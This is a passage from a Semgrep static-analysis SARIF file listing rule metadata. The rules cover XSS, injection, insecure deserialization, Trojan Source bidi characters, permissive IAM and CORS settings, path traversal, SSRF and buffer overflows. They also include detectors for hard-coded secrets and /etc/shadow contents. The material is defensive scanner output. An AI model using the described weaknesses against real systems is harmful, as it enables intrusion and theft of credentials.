with a literal forward slash and concatenate the URL, like this: href='/<%= link =>'. You may also consider setting the Content Security Policy (CSP) header."},"helpUri":"https://semgrep.dev/r/ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","id":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","name":"ruby.rails.security.audit.xss.templates.var-in-href.var-in-href","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.rails.security.audit.xss.templates.var-in-href.var-in-href"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"help":{"markdown":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters)\n - [https://trojansource.codes/](https://trojansource.codes/)\n","text":"This code contains bidirectional (bidi) characters. While this is useful for support of right-to-left languages such as Arabic or Hebrew, it can also be used to trick language parsers into executing code in a manner that is different from how it is displayed in code editing and review tools. If this is not what you were expecting, please review this code in an editor that can reveal hidden Unicode characters."},"helpUri":"https://semgrep.dev/r/generic.unicode.security.bidi.contains-bidirectional-characters","id":"generic.unicode.security.bidi.contains-bidirectional-characters","name":"generic.unicode.security.bidi.contains-bidirectional-characters","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: generic.unicode.security.bidi.contains-bidirectional-characters"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.pgx.pgx-empty-password.pgx-empty-password","id":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","name":"go.secrets.pgx.pgx-empty-password.pgx-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.pgx.pgx-empty-password.pgx-empty-password"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://dill.readthedocs.io/en/latest/index.html](https://dill.readthedocs.io/en/latest/index.html)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pypi.org/project/dill/](https://pypi.org/project/dill/)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `dill` module allows arbitrary user defined classes and functions to be serialized. We do not recommend using it for unpickling data from untrusted sources. For deserializing data from untrusted sources we recommend using YAML or JSON libraries with built-in protections."},"helpUri":"https://semgrep.dev/r/python.django.deserialization.tainted-dill-django.tainted-dill-django","id":"python.django.deserialization.tainted-dill-django.tainted-dill-django","name":"python.django.deserialization.tainted-dill-django.tainted-dill-django","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.deserialization.tainted-dill-django.tainted-dill-django"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"help":{"markdown":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role)\n - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/)\n","text":"Detected wildcard access granted to sts:AssumeRole. This means anyone with your AWS account ID and the name of the role can assume the role. Instead, limit to a specific identity in your account, like this: `arn:aws:iam:::root`."},"helpUri":"https://semgrep.dev/r/json.aws.security.wildcard-assume-role.wildcard-assume-role","id":"json.aws.security.wildcard-assume-role.wildcard-assume-role","name":"json.aws.security.wildcard-assume-role.wildcard-assume-role","properties":{"precision":"very-high","tags":["CWE-250: Execution with Unnecessary Privileges","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: json.aws.security.wildcard-assume-role.wildcard-assume-role"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"help":{"markdown":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors)\n - [https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin](https://developer.mozilla.org/ru/docs/Web/HTTP/Headers/Access-Control-Allow-Origin)\n","text":"Access-Control-Allow-Origin response header is set to \"*\". This will disable CORS Same Origin Policy restrictions."},"helpUri":"https://semgrep.dev/r/php.lang.security.php-permissive-cors.php-permissive-cors","id":"php.lang.security.php-permissive-cors.php-permissive-cors","name":"php.lang.security.php-permissive-cors.php-permissive-cors","properties":{"precision":"very-high","tags":["CWE-346: Origin Validation Error","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.php-permissive-cors.php-permissive-cors"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Make sure that unverified user data can not reach `sandbox`."},"help":{"markdown":"Make sure that unverified user data can not reach `sandbox`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Make sure that unverified user data can not reach `sandbox`."},"helpUri":"https://semgrep.dev/r/javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","id":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","name":"javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sandbox.security.audit.sandbox-code-injection.sandbox-code-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"help":{"markdown":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return)\n - [https://pkg.go.dev/sync#Mutex](https://pkg.go.dev/sync#Mutex)\n - [https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/](https://blog.trailofbits.com/2020/06/09/how-to-check-if-a-mutex-is-locked-in-go/)\n","text":"Missing mutex unlock (`$T` variable) before returning from a function. This could result in panics resulting from double lock operations"},"helpUri":"https://semgrep.dev/r/trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","id":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","name":"trailofbits.go.missing-unlock-before-return.missing-unlock-before-return","properties":{"precision":"very-high","tags":["CWE-667: Improper Locking","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: trailofbits.go.missing-unlock-before-return.missing-unlock-before-return"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://sqlobject.org/SQLBuilder.html](https://sqlobject.org/SQLBuilder.html)\n - [https://sqlobject.org/SQLObject.html](https://sqlobject.org/SQLObject.html)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Don’t manually concatenate values to a query, use SQLBuilder instead to avoid SQL injection."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlobject-flask.sqlobject-flask","id":"python.flask.db.sqlobject-flask.sqlobject-flask","name":"python.flask.db.sqlobject-flask.sqlobject-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlobject-flask.sqlobject-flask"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Generic Secret detected"},"help":{"markdown":"Generic Secret detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Generic Secret detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-generic-secret.detected-generic-secret","id":"generic.secrets.security.detected-generic-secret.detected-generic-secret","name":"generic.secrets.security.detected-generic-secret.detected-generic-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-generic-secret.detected-generic-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"help":{"markdown":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n","text":"Untrusted user input in {url: ...} can result in Open Redirect vulnerability."},"helpUri":"https://semgrep.dev/r/typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","id":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","name":"typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect","properties":{"precision":"very-high","tags":["CWE-601: URL Redirection to Untrusted Site ('Open Redirect')","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.nestjs.security.audit.nestjs-open-redirect.nestjs-open-redirect"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","id":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","name":"python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-shelve-fastapi.tainted-shelve-fastapi"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false)\n - [https://owasp.org/Top10/A05_2021-Security_Misconfiguration](https://owasp.org/Top10/A05_2021-Security_Misconfiguration)\n","text":"Detected a cookie where the `Secure` flag is either missing or disabled. The `Secure` cookie flag instructs the browser to forbid sending the cookie over an insecure HTTP request. Set the `Secure` flag to `true` so the cookie will only be sent over HTTPS. If this wasn't intentional, it's recommended to set the Secure flag to true so the cookie will always be sent over HTTPS. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `True` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag to False on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","id":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","name":"python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false","properties":{"precision":"very-high","tags":["CWE-614: Sensitive Cookie in HTTPS Session Without 'Secure' Attribute","HIGH CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-secure-false.flask-cookie-secure-false"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `phantom` page methods it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.phantom.security.audit.phantom-injection.phantom-injection","id":"javascript.phantom.security.audit.phantom-injection.phantom-injection","name":"javascript.phantom.security.audit.phantom-injection.phantom-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.phantom.security.audit.phantom-injection.phantom-injection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","id":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","name":"csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.nosqli.mongodb-taint-grpc.mongodb-taint-grpc"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"help":{"markdown":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"The function `$FUN` does not impose any size limitation to what it writes to `$BUF`. That may lead to a stack buffer overflow if there is no validation on the size of the input."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","id":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","name":"cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer","properties":{"precision":"very-high","tags":["CWE-120: Buffer Copy without Checking Size of Input ('Classic Buffer Overflow')","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.unbounded-copy-to-stack-buffer.unbounded-copy-to-stack-buffer"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal)\n - [https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values](https://scala-slick.org/doc/3.3.3/sql.html#splicing-literal-values)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Avoid using `#$variable` and use `$variable` in `sql\"...\"` strings instead."},"helpUri":"https://semgrep.dev/r/scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","id":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","name":"scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: scala.slick.security.scala-slick-sql-non-literal.scala-slick-sql-non-literal"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"linux shadow file detected"},"help":{"markdown":"linux shadow file detected\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"linux shadow file detected"},"helpUri":"https://semgrep.dev/r/generic.secrets.security.detected-etc-shadow.detected-etc-shadow","id":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","name":"generic.secrets.security.detected-etc-shadow.detected-etc-shadow","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","LOW CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: generic.secrets.security.detected-etc-shadow.detected-etc-shadow"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"help":{"markdown":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be used to build an LDAP query, which can allow attackers to run arbitrary LDAP queries. If an LDAP query must contain untrusted input then it must be escaped."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","id":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","name":"cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn","properties":{"precision":"very-high","tags":["CWE-90: Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.ldap.ldap-injection-dn.ldap-injection-dn"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask)\n - [https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/](https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/;](https://davidhamann.de/2020/04/05/exploiting-python-pickle/;)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f)](https://pytorch.org/docs/stable/_modules/torch/distributed/distributed_c10d.html#broadcast_object_list:~:text=.BytesIO()-,_pickler,-(f))\n - [https://pytorch.org/docs/stable/generated/torch.load.html](https://pytorch.org/docs/stable/generated/torch.load.html)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. A number of functions and packages in the `torch` module rely on the `pickle` module and should not be used to unpackage data from untrusted sources."},"helpUri":"https://semgrep.dev/r/python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","id":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","name":"python.flask.deserialization.tainted-torch-pickle-flask.tainted-torch-pickle-flask","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: 